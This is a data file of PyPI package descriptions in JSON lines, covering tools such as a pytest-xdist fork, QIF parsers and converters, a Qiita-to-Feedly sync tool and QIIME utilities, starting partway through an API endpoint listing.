jobBatchJobsApienqueue_batch_job_batch_jobs_id_enqueue_patchPATCH/batch_jobs/{id}/enqueueEnqueue batch job for executionBatchJobsApifinish_batch_job_batch_jobs_id_finish_patchPATCH/batch_jobs/{id}/finishFinish batch jobBatchJobsApipeek_batch_job_batch_jobs_peek_patchPATCH/batch_jobs/peekPeek batch jobBatchJobsApipop_batch_job_batch_jobs_pop_patchPATCH/batch_jobs/popTake batch jobBatchJobsApiread_batch_jobs_batch_jobs_getGET/batch_jobsList batch jobsBatchJobsApiunpop_batch_job_batch_jobs_unpop_patchPATCH/batch_jobs/unpopTake batch jobCommitsApicreate_commit_commits_postPOST/commitsCreate commitCommitsApidelete_commit_commits_id_deleteDELETE/commits/{id}Destroy commitCommitsApiread_commit_commits_id_getGET/commits/{id}Get commit by IDCommitsApiread_commits_commits_getGET/commitsList commitsFilesApicreate_file_files_postPOST/filesCreate fileFilesApidelete_file_files_id_deleteDELETE/files/{id}Destroy fileFilesApiread_file_files_id_getGET/files/{id}Retrieve fileFilesApiread_files_files_getGET/filesList filesFinalResultsApicreate_final_result_final_results_postPOST/final_resultsCreate final resultFinalResultsApiread_final_result_by_job_id_final_results_job_job_id_getGET/final_results/job/{job_id}Retrieve final result by job IDFinalResultsApiread_final_result_final_results_id_getGET/final_results/{id}Retrieve final resultJobsApicreate_job_jobs_postPOST/jobsCreate jobJobsApidelete_job_jobs_id_deleteDELETE/jobs/{id}Destroy jobJobsApiread_job_jobs_id_getGET/jobs/{id}Retrieve jobJobsApiread_jobs_jobs_getGET/jobsList jobsJobsApiupdate_job_status_jobs_id_patchPATCH/jobs/{id}Update Job StatusLanguagesApiread_language_languages_id_getGET/languages/{id}Retrieve languageLanguagesApiread_languages_languages_getGET/languagesList 
languagesMembersApicreate_member_members_postPOST/membersCreate memberMembersApidelete_member_members_id_deleteDELETE/members/{id}Destroy memberMembersApiread_member_members_id_getGET/members/{id}Retrieve memberMembersApiread_members_members_getGET/membersList membersMetadataApicreate_metadata_self_metadata_postPOST/metadataCreate metadataMetadataApiread_metadata_by_backend_id_metadata_backend_backend_id_getGET/metadata/backend/{backend_id}Retrieve metadata by backend IDMetadataApiread_metadata_metadata_id_getGET/metadata/{id}Get metadata by IDPermissionsApiread_permission_group_permission_groups_id_getGET/permission_groups/{id}Retrieve permission groupsPermissionsApiread_permission_groups_permission_groups_getGET/permission_groups/List permission groupsPermissionsApiread_permission_permissions_id_getGET/permissions/{id}Retrieve permissionsPermissionsApiread_permissions_permissions_getGET/permissions/List permissionsProjectsApicreate_project_projects_postPOST/projectsCreate projectProjectsApidelete_project_projects_id_deleteDELETE/projects/{id}Destroy projectProjectsApipartial_update_project_projects_id_patchPATCH/projects/{id}Partially update projectProjectsApiread_project_projects_id_getGET/projects/{id}Retrieve projectProjectsApiread_projects_projects_getGET/projectsList projectsProjectsApiupdate_project_projects_id_putPUT/projects/{id}Update projectReservationsApicreate_reservation_reservations_postPOST/reservationsCreate reservationReservationsApiread_reservation_reservations_id_getGET/reservations/{id}Retrieve reservationReservationsApiread_reservations_reservations_getGET/reservationsList reservationsReservationsApiterminate_reservation_reservations_id_terminate_patchPATCH/reservations/{id}/terminateTerminate reservationResultsApicreate_result_results_postPOST/resultsCreate resultResultsApidelete_results_by_job_id_results_job_job_id_deleteDELETE/results/job/{job_id}Delete results by job IDResultsApiread_result_results_id_getGET/results/{id}Retrieve resultResultsApiread_results_by_job_id_results_job_job_id_getGET/results/job/{job_id}Retrieve results by job IDTeamsApiread_team_teams_id_getGET/teams/{id}Retrieve teamsTeamsApiread_teams_teams_getGET/teams/List teamsTransactionsApiread_transaction_transactions_id_getGET/transactions/{id}Retrieve transactionsTransactionsApiread_transactions_transactions_getGET/transactions/List transactionsUsersApicreate_user_users_postPOST/usersCreate userUsersApidelete_user_users_id_deleteDELETE/users/{id}Destroy userUsersApiread_user_users_id_getGET/users/{id}Retrieve userUsersApiread_users_users_getGET/usersList usersDocumentation For ModelsAlgorithmAlgorithmInAlgorithmTypeBackendBackendPatchBackendStatusBackendTypeBackendWithAuthenticationBatchJobBatchJobInBatchJobStatusCommitCommitInCompileStageDomainFileFileInFinalResultFinalResultInHTTPNotFoundErrorHTTPValidationErrorJobJobInJobPatchJobStatusLanguageLocationInnerMemberMemberInMetadataMetadataInPermissionPermissionGroupProjectProjectInProjectPatchReservationReservationInResultResultInRoleShareTypeTeamTransactionUserUserInValidationErrorDocumentation For AuthorizationAuthentication schemes defined for the API:userType: API keyAPI key parameter name: X-useridLocation: HTTP headerbackendType: API keyAPI key parameter name: AuthorizationLocation: HTTP headerAuthor"} +{"package": "qicore", "pacakge-description": "QiCore\u2014QiCore Python Module."} +{"package": "qidicom", "pacakge-description": "qidicom is a facade for DICOM file interaction. 
See thedocumentationfor more information."} +{"package": "qiea", "pacakge-description": "#README"} +{"package": "qieman-xdist", "pacakge-description": "xdist: pytest distributed testing pluginThepytest-xdistplugin extends pytest with some unique\ntest execution modes:test runparallelization: if you have multiple CPUs or hosts you can use\nthose for a combined test run. This allows to speed up\ndevelopment or to use special resources ofremote machines.--looponfail: run your tests repeatedly in a subprocess. After each run\npytest waits until a file in your project changes and then re-runs\nthe previously failing tests. This is repeated until all tests pass\nafter which again a full run is performed.Multi-Platformcoverage: you can specify different Python interpreters\nor different platforms and run tests in parallel on all of them.Before running tests remotely,pytestefficiently \u201crsyncs\u201d your\nprogram source code to the remote place. All test results\nare reported back and displayed to your local terminal.\nYou may specify different Python versions and interpreters.If you would like to know how pytest-xdist works under the covers, checkoutOVERVIEW.InstallationInstall the plugin with:pip install pytest-xdistTo usepsutilfor detection of the number of CPUs available, install thepsutilextra:pip install pytest-xdist[psutil]Speed up test runs by sending tests to multiple CPUsTo send tests to multiple CPUs, use the-n(or--numprocesses) option:pytest -n NUMCPUSPass-nautoto use as many processes as your computer has CPU cores. This\ncan lead to considerable speed ups, especially if your test suite takes a\nnoticeable amount of time.If a test crashes a worker, pytest-xdist will automatically restart that worker\nand report the test\u2019s failure. You can use the--max-worker-restartoption\nto limit the number of worker restarts that are allowed, or disable restarting\naltogether using--max-worker-restart0.By default, using--numprocesseswill send pending tests to any worker that\nis available, without any guaranteed order. You can change the test\ndistribution algorithm this with the--distoption. It takes these values:--distno: The default algorithm, distributing one test at a time.--distloadscope: Tests are grouped bymodulefortest functionsand byclassfortest methods. Groups are distributed to available\nworkers as whole units. This guarantees that all tests in a group run in the\nsame process. This can be useful if you have expensive module-level or\nclass-level fixtures. Grouping by class takes priority over grouping by\nmodule.--distloadfile: Tests are grouped by their containing file. Groups are\ndistributed to available workers as whole units. This guarantees that all\ntests in a file run in the same worker.Making session-scoped fixtures execute only oncepytest-xdistis designed so that each worker process will perform its own collection and execute\na subset of all tests. 
This means that tests in different processes requesting a high-level\nscoped fixture (for examplesession) will execute the fixture code more than once, which\nbreaks expectations and might be undesired in certain situations.Whilepytest-xdistdoes not have a builtin support for ensuring a session-scoped fixture is\nexecuted exactly once, this can be achieved by using a lock file for inter-process communication.The example below needs to execute the fixturesession_dataonly once (because it is\nresource intensive, or needs to execute only once to define configuration options, etc), so it makes\nuse of aFileLockto produce the fixture data only once\nwhen the first process requests the fixture, while the other processes will then read\nthe data from a file.Here is the code:importjsonimportpytestfromfilelockimportFileLock@pytest.fixture(scope=\"session\")defsession_data(tmp_path_factory,worker_id):ifworker_id==\"master\":# not executing in with multiple workers, just produce the data and let# pytest's fixture caching do its jobreturnproduce_expensive_data()# get the temp directory shared by all workersroot_tmp_dir=tmp_path_factory.getbasetemp().parentfn=root_tmp_dir/\"data.json\"withFileLock(str(fn)+\".lock\"):iffn.is_file():data=json.loads(fn.read_text())else:data=produce_expensive_data()fn.write_text(json.dumps(data))returndataThe example above can also be use in cases a fixture needs to execute exactly once per test session, like\ninitializing a database service and populating initial tables.This technique might not work for every case, but should be a starting point for many situations\nwhere executing a high-scope fixture exactly once is important.Running tests in a Python subprocessTo instantiate a python3.5 subprocess and send tests to it, you may type:pytest -d --tx popen//python=python3.5This will start a subprocess which is run with thepython3.5Python interpreter, found in your system binary lookup path.If you prefix the \u2013tx option value like this:--tx 3*popen//python=python3.5then three subprocesses would be created and tests\nwill be load-balanced across these three processes.Running tests in a boxed subprocessThis functionality has been moved to thepytest-forkedplugin, but the--boxedoption\nis still kept for backward compatibility.Sending tests to remote SSH accountsSuppose you have a packagemypkgwhich contains some\ntests that you can successfully run locally. And you\nhave a ssh-reachable machinemyhost. 
Then\nyou can ad-hoc distribute your tests by typing:pytest -d --tx ssh=myhostpopen --rsyncdir mypkg mypkgThis will synchronize yourmypkgpackage directory\nto a remote ssh account and then locally collect tests\nand send them to remote places for execution.You can specify multiple--rsyncdirdirectories\nto be sent to the remote side.NoteFor pytest to collect and send tests correctly\nyou not only need to make sure all code and tests\ndirectories are rsynced, but that any test (sub) directory\nalso has an__init__.pyfile because internally\npytest references tests as a fully qualified python\nmodule path.You will otherwise get strange errorsduring setup of the remote side.You can specify multiple--rsyncignoreglob patterns\nto be ignored when file are sent to the remote side.\nThere are also internal ignores:.*, *.pyc, *.pyo, *~Those you cannot override using rsyncignore command-line or\nini-file option(s).Sending tests to remote Socket ServersDownload the single-modulesocketserver.pyPython program\nand run it like this:python socketserver.pyIt will tell you that it starts listening on the default\nport. You can now on your home machine specify this\nnew socket host with something like this:pytest -d --tx socket=192.168.1.102:8888 --rsyncdir mypkg mypkgRunning tests on many platforms at onceThe basic command to run tests on multiple platforms is:pytest --dist=each --tx=spec1 --tx=spec2If you specify a windows host, an OSX host and a Linux\nenvironment this command will send each tests to all\nplatforms - and report back failures from all platforms\nat once. The specifications strings use thexspec syntax.Identifying the worker process during a testNew in version 1.15.If you need to determine the identity of a worker process in\na test or fixture, you may use theworker_idfixture to do so:@pytest.fixture()defuser_account(worker_id):\"\"\" use a different account in each xdist worker \"\"\"return\"account_%s\"%worker_idWhenxdistis disabled (running with-n0for example), thenworker_idwill return\"master\".Worker processes also have the following environment variables\ndefined:PYTEST_XDIST_WORKER: the name of the worker, e.g.,\"gw2\".PYTEST_XDIST_WORKER_COUNT: the total number of workers in this session,\ne.g.,\"4\"when-n4is given in the command-line.The information about the worker_id in a test is stored in theTestReportas\nwell, under theworker_idattribute.Since version 2.0, the following functions are also available in thexdistmodule:defis_xdist_worker(request_or_session)->bool:\"\"\"Return `True` if this is an xdist worker, `False` otherwise\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"defis_xdist_master(request_or_session)->bool:\"\"\"Return `True` if this is the xdist master, `False` otherwise\n\n Note: this method also returns `False` when distribution has not been\n activated at all.\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"defget_xdist_worker_id(request_or_session)->str:\"\"\"Return the id of the current worker ('gw0', 'gw1', etc) or 'master'\n if running on the 'master' node.\n\n If not distributing tests (for example passing `-n0` or not passing `-n` at all) also return 'master'.\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"Uniquely identifying the current test runNew in version 1.32.If you need to globally distinguish one test run from others in your\nworkers, you can use thetestrun_uidfixture. 
For instance, let\u2019s say you\nwanted to create a separate database for each test run:importpytestfromposix_ipcimportSemaphore,O_CREAT@pytest.fixture(scope=\"session\",autouse=True)defcreate_unique_database(testrun_uid):\"\"\" create a unique database for this particular test run \"\"\"database_url=f\"psql://myapp-{testrun_uid}\"withSemaphore(f\"/{testrun_uid}-lock\",flags=O_CREAT,initial_value=1):ifnotdatabase_exists(database_url):create_database(database_url)@pytest.fixture()defdb(testrun_uid):\"\"\" retrieve unique database \"\"\"database_url=f\"psql://myapp-{testrun_uid}\"returndatabase_get_instance(database_url)Additionally, during a test run, the following environment variable is defined:PYTEST_XDIST_TESTRUNUID: the unique id of the test run.Accessingsys.argvfrom the master node in workersTo access thesys.argvpassed to the command-line of the master node, userequest.config.workerinput[\"mainargv\"].Specifying test exec environments in an ini fileYou can use pytest\u2019s ini file configuration to avoid typing common options.\nYou can for example make running with three subprocesses your default like this:[pytest]addopts=-n3You can also add default environments like this:[pytest]addopts=--tx ssh=myhost//python=python3.5 --tx ssh=myhost//python=python3.6and then just type:pytest --dist=eachto run tests in each of the environments.Specifying \u201crsync\u201d dirs in an ini-fileIn atox.iniorsetup.cfgfile in your root project directory\nyou may specify directories to include or to exclude in synchronisation:[pytest]rsyncdirs=. mypkg helperpkgrsyncignore=.hgThese directory specifications are relative to the directory\nwhere the configuration file was found."} +{"package": "qieyun", "pacakge-description": "qieyun-pythonA Python library for the Qieyun phonological systemInstall$pipinstallqieyunDocumentationSeedocumentation."} +{"package": "qieyun-encoder", "pacakge-description": "qieyun-encoder-pythonA Python library for the operating the basic structure of the Qieyun phonological systemInstall$pipinstallqieyun-encoder"} +{"package": "qif", "pacakge-description": "libqifInstallpipinstallqifNeedspython>= 3.8 and asandybridgeor later CPUOn linuxpip>= 19 is needed (make sure topip install -U pip)A sample programfromqifimport*defcompute_bayes(C):pi=probab.uniform(C.shape[0])print(\"Channel:\\n\",C)print(\"Prior:\\n\",pi)print(\"Bayes vulnerability\",measure.bayes_vuln.posterior(pi,C))print(\"Bayes mult-capacity\",measure.bayes_vuln.mult_capacity(C))compute_bayes(channel.randu(5))# same, but using rational arithmeticqif.set_default_type(qif.rat)C=np.array([[rat(1,2),rat(1,4),rat(1,4)],[rat(1,6),rat(3,6),rat(2,6)],[rat(1,2),rat(1,2),rat(0)],])compute_bayes(C)DocumentationA list of methods provided byqifis availablehere.Use libqif with C++See theinstallation instructions."} +{"package": "qif2ofx", "pacakge-description": "qif2ofxConvert credit card transactions inQuicken Interchange format(QIF) toOpen Financial Exchange(OFX).\nUse this if you can only comfortably import OFX in your finance tool of choice. For example, I usebeancount-import(what an excellent tool!), but so far it only directly supports ingesting OFX. 
My bank decides to only distribute in QIF, so hence this (lazy) way of solving the problem.The converter assumes you have credit card transactions in your QIF, and not whatever else QIF can be used to represent, because that's my only use-case so far.InstallThe following provides the executableqif2ofxand the python libraryqif2ofx:pip install qif2ofxUsageOFX is a lot richer than QIF, from what I gathered from briefly looking atthe specification(don't, if you want to preserve your sanity. It hurts my eyes. Why did they make all the tags in capital letters). QIF is basically a list of transactions, without real context, while OFX offers rich descriptions of all sorts of financial concepts. Hell, QIF doesn't even have a concept of currency. Hence to convert our QIF input to OFX we need to provide a bunch of metadata:qif2ofx \\ \n # A glob expression, or path for that matter, of QIF files\n # we'd like to convert to OFX\n --glob \"path/to/**/*.qif\" \\\n\n # The currency we'd like to set in our OFX file. \n --currency GBP \\\n\n # Again, QIF has no notion of accounts, OFX does. Tools handling\n # OFX expect an account identifier so they can reconcile with\n # the appropriate account in the money management tool.\n --acctid puppiesThis is the bare minimum we need to generate a valid-ish OFX out of your QIF. You can set a few more options through the command line to control some details, seeqif2ofx --helpfor more details."} +{"package": "qifiaccount", "pacakge-description": "QIFIAccount"} +{"package": "qifimanager", "pacakge-description": "qifimanager"} +{"package": "qifparse", "pacakge-description": "QIF Parserqifparse is a parser for Quicken interchange format files (.qif).Even if the qif format is:quite old nownot supported for import by Quicken any more,ambiguous in some data management (notably on dates)it\u2019s still quite commonly used by many personal finance managers.UsageHere\u2019s a sample parsing:>>> from qifparse.parser import QifParser\n>>> qif = QifParser.parse(file('file.qif'))\n>>> qif.get_accounts()\n(, )\n>>> qif.accounts[0].name\n'My Cash'\n>>> qif.get_categories()\n(, )\n>>> qif.accounts[0].get_transactions()\n(, )\n>>> str(qif)\n'!Type:Cat\\nNfood\\nE\\n^\\nNfood:lunch\\nE\\n^\\n!Account\\nNMy Cash\\nTCash\\n^\\n!Type:Cash...\n...Here\u2019s a sample of a structure creation:>>> qif_obj = qif.Qif()\n>>> acc = qif.Account(name='My Cc', account_type='Bank')\n>>> qif_obj.add_account(acc)\n>>> cat = qif.Category(name='food')\n>>> qif_obj.add_category(cat)\n>>> tr1 = qif.Transaction(amount=0.55)\n>>> acc.add_transaction(tr1, header='!Type:Bank')\n\n>>> tr2 = qif.Transaction()\n>>> tr2.amount = -6.55\n>>> tr2.to_account = 'Cash'\n>>> acc.add_transaction(tr2)\n>>> acc.add(tr2)\n>>> str(qif_obj)\n'!Type:Cat\\nNfood\\nE\\n^\\n!Account\\nNMy Cc\\nTBank\\n^\\n!Type:Bank\\nD02/11/2013\\nT...\n...More infosFor more informations about qif format:http://en.wikipedia.org/wiki/Quicken_Interchange_Formathttp://svn.gnucash.org/trac/browser/gnucash/trunk/src/import-export/qif-import/file-format.txtChangelog0.5 (2013-11-03)now transactions can also be outside accountsmoved properties to method in order to accept filters0.4 (2013-11-02)address can be multilinessplit can have the address attributeadd support for Classesadd support for MemorizedTransaction0.3 (2013-11-02)more refactoring, now the lib is much more simple and engineeredimproved fields validation0.2 (2013-11-02)huge refactor, now the structure can be create and modified programmatically0.1 (2013-11-01)first release on Pypi"} 
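As a quick follow-up to the qifparse entry above, here is a minimal script-style sketch that simply chains the calls its doctest already demonstrates (QifParser.parse, get_accounts, get_transactions, str). It assumes Python 3, substitutes open() for the Python-2 file() builtin used in the doctest, and uses the placeholder filename file.qif; the exact objects returned by get_transactions depend on the installed qifparse version.

```python
# Minimal sketch based only on the qifparse calls shown in the entry above.
# Assumptions: Python 3, and a QIF file named 'file.qif' (a placeholder name)
# in the current directory.
from qifparse.parser import QifParser

with open('file.qif') as fh:
    qif = QifParser.parse(fh)            # build a Qif object from the file

for account in qif.get_accounts():       # accounts declared in the file
    print(account.name)                  # e.g. 'My Cash'
    for transactions in account.get_transactions():
        print(transactions)              # transaction (list) objects, per the doctest

print(str(qif))                          # str(qif) serializes everything back to QIF text
```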
+{"package": "qifparser", "pacakge-description": "QIF Parserqifparse is a parser for Quicken interchange format files (.qif).Even if the qif format is:quite old nownot supported for import by Quicken any more,ambiguous in some data management (notably on dates)it\u2019s still quite commonly used by many personal finance managers.UsageHere\u2019s a sample parsing:>>> from qifparse.parser import QifParser\n>>> qif = QifParser.parse(file('file.qif'))\n>>> qif.get_accounts()\n(, )\n>>> qif.accounts[0].name\n'My Cash'\n>>> qif.get_categories()\n(, )\n>>> qif.accounts[0].get_transactions()\n(, )\n>>> str(qif)\n'!Type:Cat\\nNfood\\nE\\n^\\nNfood:lunch\\nE\\n^\\n!Account\\nNMy Cash\\nTCash\\n^\\n!Type:Cash...\n...Here\u2019s a sample of a structure creation:>>> qif_obj = qif.Qif()\n>>> acc = qif.Account(name='My Cc', account_type='Bank')\n>>> qif_obj.add_account(acc)\n>>> cat = qif.Category(name='food')\n>>> qif_obj.add_category(cat)\n>>> tr1 = qif.Transaction(amount=0.55)\n>>> acc.add_transaction(tr1, header='!Type:Bank')\n\n>>> tr2 = qif.Transaction()\n>>> tr2.amount = -6.55\n>>> tr2.to_account = 'Cash'\n>>> acc.add_transaction(tr2)\n>>> acc.add(tr2)\n>>> str(qif_obj)\n'!Type:Cat\\nNfood\\nE\\n^\\n!Account\\nNMy Cc\\nTBank\\n^\\n!Type:Bank\\nD02/11/2013\\nT...\n...More infosFor more informations about qif format:http://en.wikipedia.org/wiki/Quicken_Interchange_Formathttp://svn.gnucash.org/trac/browser/gnucash/trunk/src/import-export/qif-import/file-format.txtChangelog0.6 (unreleased)fixed typo in account types0.5 (2013-11-03)now transactions can also be outside accountsmoved properties to method in order to accept filters0.4 (2013-11-02)address can be multilinessplit can have the address attributeadd support for Classesadd support for MemorizedTransaction0.3 (2013-11-02)more refactoring, now the lib is much more simple and engineeredimproved fields validation0.2 (2013-11-02)huge refactor, now the structure can be create and modified programmatically0.1 (2013-11-01)first release on Pypi"} +{"package": "qifqif", "pacakge-description": "qifqif/k\u012df k\u012df/:adj. inv.arabic slang (\u0643\u064a\u0641) for \u201cit\u2019s all the same\u201d.n.CLI tool forcategorizingqif files. It can make all the difference.DescriptionCLI tool toenrichyour QIF files transactions with category\ninformation, hencecutting down import time from minutes to mere\nseconds.QIF is a format widely used by personal money management software such\nasGnuCashto import information. Yet, the\nimport process is particularly tedious as it require to manually pair\nthe transactions contained in the file with categories (or \u201caccounts\u201d\nfor double-entry bookkeeping systems).qifqif augment your qif files by adding a category line for each\ntransaction, that additional information can then be used by accounting\nsoftware to perform automatic QIF imports. It picks categories by\nsearching for predefined keywords in transactions descriptions lines and\nby repeating choices you previously made regarding similar transactions.FeaturesQuickstart:create categories by importing your existing accounts\nwithqifaccBlazing fast edits:thanks to well-thought-out defaults andcompletionAuditing mode:review your transactions one by oneBatch mode (no interactive):for easy integration with scriptsEasy-going workflow:dreading the behemoth task of importing\nyears of accounting from a single file? Don\u2019t be. Go at your own pace\nand pressto exit anytime. 
On next run, editing will\nresume right where you left it.Usageusage: qifqif.py [-h] [-a | -b] [-c CONFIG] [-d] [-f] [-o DEST] [-v] QIF_FILE\n\nEnrich your .QIF files with tags. See https://github.com/Kraymer/qifqif for\nmore infos.\n\npositional arguments:\n QIF_FILE .QIF file to process\n\noptional arguments:\n -h, --help show this help message and exit\n -a, --audit-mode pause after each transaction\n -b, --batch-mode skip transactions that require user input\n -c CONFIG, --config CONFIG\n configuration filename in json format. DEFAULT:\n ~/.qifqif.json\n -d, --dry-run just print instead of writing file\n -f, --force discard transactions categories if not present in\n configuration file. Repeat the flag (-ff) to force\n editing of all transactions.\n -o DEST, --output DEST\n output filename. DEFAULT: edit input file in-place\n -v, --version display version information and exitMore infos on thedocumentationwebsite.Installationqiqif is written forPython 2.7+andPython\n3.5+.Install withpipviapip install qifqifcommand.ChangelogAvailable onGithub Releases\npage.FeedbacksPlease submit bugs and features requests on theIssue\ntracker."} +{"package": "qigeometry", "pacakge-description": "QiGeometry\u2014QiGeometry Python Module."} +{"package": "qi.Goban", "pacakge-description": "qi.Goban is a product for Go players and clubs. It allows you to add games as content, view them, comment on them, and add variations.Features:* Import games from the standard go format sgf version 4* Display ajax views of the game (using kss)* Supports full annotations, letters, triangles, etc.* Parse and add variations to games* Export pdf diagrams (using sgf2dg)* Automatic tagging according to the rank of the players"} +{"package": "qi.GRSplitter", "pacakge-description": "Introduction============The default plone/zope splitters do not properly work with greek text. This product removes accents from greek strings and properly replaces them with unicode, enabling your searches to work out of the box!Installation============If not using generic setup with plone:1) Create a ZCTextIndex Lexicon from ZMI2) Delete in the portal_catalog the indexes that contain greek text and recreate them using GRSplitter as a splitter.If you are using generic setup profiles, here is an example snippet to help you with catalog.xmlChangelog=========1.1.1----------------* egg-fix release1.1----------------* Initial release"} +{"package": "qihoo-for-t", "pacakge-description": "No description available on PyPI."} +{"package": "qihoo-for-test", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qiidly", "pacakge-description": "qiidly======[![Build Status](https://travis-ci.org/uraxy/qiidly.svg?branch=master)](https://travis-ci.org/uraxy/qiidly)Feedly\u306eAndroid\u30a2\u30d7\u30ea\u306f\u5feb\u9069\uff01blog\u3092\u8aad\u3080\u3060\u3051\u3058\u3083\u3082\u3063\u305f\u3044\u306a\u3044\u3001Qiita\u306e\u65b0\u7740\u8a18\u4e8b\u3082\u30c1\u30a7\u30c3\u30af\u3059\u308b\u3068\u3082\u3063\u3068\u5feb\u9069\uff01\u305d\u306e\u305f\u3081\u306b\u306f\u2026- Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0- Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30e6\u30fc\u30b6\u30fc\u3092\u30ab\u30f3\u30bf\u30f3\u306bFeedly\u306b\u540c\u671f\u3067\u304d\u306a\u304d\u3083\u3002\u305d\u306e\u305f\u3081\u306e\u30c4\u30fc\u30eb\u304cqiidly\u306a\u306e\u3060\u3002-----qiidly\u306f\u3001Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0\u3068\u30e6\u30fc\u30b6\u30fc\u306e\u30d5\u30a3\u30fc\u30c9\u3092Feedly\u306b\u540c\u671f\u3059\u308b\u30c4\u30fc\u30eb\u3067\u3059\u3002Qiita\u3067\u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u3082\u306e\u306f\u3001Feedly\u306b\u6b21\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u767b\u9332\u3055\u308c\u307e\u3059\u3002- \u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30bf\u30b0 -> Qiita:tags- \u30d5\u30a9\u30ed\u30fc\u4e2d\u306e\u30e6\u30fc\u30b6\u30fc -> Qiita:followeesQiita\u3067\u30d5\u30a9\u30ed\u30fc\u3092\u89e3\u9664\u3057\u305f\u3082\u306e\u306f\u3001Feedly\u304b\u3089\u524a\u9664\u3055\u308c\u307e\u3059\u3002\u30d5\u30a3\u30fc\u30c9\u304c\u65e2\u306b\u4ed6\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u767b\u9332\u3055\u308c\u3066\u3044\u308b\u5834\u5408\u3001\u305d\u306e\u30ab\u30c6\u30b4\u30ea\u3067\u306e\u767b\u9332\u306f\u7dad\u6301\u3055\u308c\u307e\u3059\u3002\u3064\u307e\u308a\u3001qiidly\u3067\u540c\u671f\u3057\u305f\u3053\u3068\u3067\u3001\u30d5\u30a3\u30fc\u30c9\u306e\u767b\u9332\u304c\u306a\u304f\u306a\u3063\u305f\u308a\u3001\u30ab\u30c6\u30b4\u30ea\u304c\u6d88\u3048\u3061\u3083\u3063\u305f\u308a\u3059\u308b\u3053\u3068\u306f\u3042\u308a\u307e\u305b\u3093\u3002Setup=====Libraries---------```sh$ pip install -r requirements.txt```- [Python Wrapper for Qiita API v2](https://github.com/petitviolet/qiita_py) ([MIT License](https://petitviolet.mit-license.org/))API Access token----------------Qiita access token- https://qiita.com/settings/applicationsFeedly developer access token- https://developer.feedly.com/v3/developer/#how-do-i-generate-a-developer-access-tokenUsage=====```bash$ python -m qiidly.command_line -husage: command_line.py [-h] -q QIITA_TOKEN -f FEEDLY_TOKENqiidly: Qiita to Feedly.optional arguments:-h, --help show this help message and exit-q QIITA_TOKEN, --qiita-token QIITA_TOKENQiita access token-f FEEDLY_TOKEN, --feedly-token FEEDLY_TOKENFeedly developer access token$``````sh$ ./qiidly.sh # == python -m qiidly.command_line -q $QIITA_TOKEN -f $FEEDLY_TOKEN## Category at Qiita: 'Qiita:tags'+ linebot- gwt+ onsenui\t=> categories['dummy', 'Qiita:tags']- Cytoscape\t=> categories['dummy']Sync following tag feeds at Qiita to Feedly? [y/n] yDone!## Category at Qiita: 'Qiita:followees'- uraxySync to Feedly? 
[y/n] yDone!$```Tests=====with unittest-------------```bash$ python -m unittest discover tests```with nose---------```bash$ nosetests --with-coverage --cover-html --cover-package=qiidly..........Name Stmts Miss Cover--------------------------------------qiidly.py 0 0 100%qiidly/feedly.py 35 14 60%qiidly/main.py 108 84 22%qiidly/qiita.py 45 25 44%--------------------------------------TOTAL 188 123 35%----------------------------------------------------------------------Ran 10 tests in 0.190sOK$ google-chrome cover/index.html$```License=======MIT License"} +{"package": "qiime", "pacakge-description": "QIIME: Quantitative Insights Into Microbial Ecologyhttp://www.qiime.orgQIIME Allows Integration and Analysis of High-Throughput Community Sequencing Data\nJ. Gregory Caporaso, Justin Kuczynski, Jesse Stombaugh, Kyle Bittinger, Frederic D. Bushman, Elizabeth K. Costello, Noah Fierer, Antonio Gonzalez Pena, Julia K. Goodrich, Jeffrey I. Gordon, Gavin A. Huttley, Scott T. Kelley, Dan Knights, Jeremy E. Koenig, Ruth E. Ley, Cathy A. Lozupone, Daniel McDonald, Brian D. Muegge, Meg Pirrung, Jens Reeder, Joel R. Sevinsky, Peter J. Turnbaugh, William van Treuren, William A. Walters, Jeremy Widmann, Tanya Yatsunenko, Jesse Zaneveld and Rob Knight.\nNature Methods, 2010."} +{"package": "qiime_2_ll_quick_viewer", "pacakge-description": "Qiime 2Ley LabQuick ViewerThis tool launches a simple web server to quickly visualize the contents locate into thedatafolder from\naQiime 2visualization artifact, i.e. files produced byQiime 2with extension*.qzv.Free software: MIT licenseInstallationYou can install this tool on a Python 3.5+ environment using either PIPpip install qiime_2_ll_quick_vieweror Condaconda install-cleylabmpi qiime_2_ll_quick_viewerUsageGiven aQiime 2visualization artifact e.g.demux.qzvyou can run this command on your server:$ qiime_2_ll_quick_viewer--filename/full_path_to/demux.qzvBy default,qiime_2_ll_quick_viewerwill launch a web server on the port8089but you can change it for the one you want with the option--portXXXX.\nThen, you can for example open a SSH tunnel to the remote port opened on your server byqiime_2_ll_quick_viewerwith this command:$ ssh-L8089:localhost:8089 user@your_serverFinally, open a browser and go to this address:http://localhost:8089.Command options:-f,--filenameTEXTFullpathtoaQiime2visualizationfile(*.qzv).[required]-p,--portINTEGERPorttolaunchthewebserver.[required]-h,--helpShowthehelpinfoandexit.CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.8 (2017-11-30)Updated version for Python 3.5+ and TOX testing.0.2.7 (2017-11-30)Updated version for Python 3.5+.0.2.6 (2017-11-29)Changes into the RST files.0.2.5 (2017-11-29)Generated a base version for a Conda package.0.2.4 (2017-11-29)Documentation has been updated to be markdown friendly.0.2.3 (2017-11-28)Repository migrated to Ley Lab\u2019s Github account.0.2.2 (2017-11-27)Documentation updated.0.2.1 (2017-11-27)Documentation updated.0.2.0 (2017-11-27)First functional version of the package.0.1.0 (2017-11-27)First release on PyPI."} +{"package": "qiime2utils", "pacakge-description": "qiime2utils is a command-line tool for manipulating Qiime 2 data."} +{"package": "qiime-default-reference", "pacakge-description": "qiime-default-referenceqiime-default-reference, canonically pronouncedchime default reference, is a\nPython package containing default reference data files for use withQIIME. 
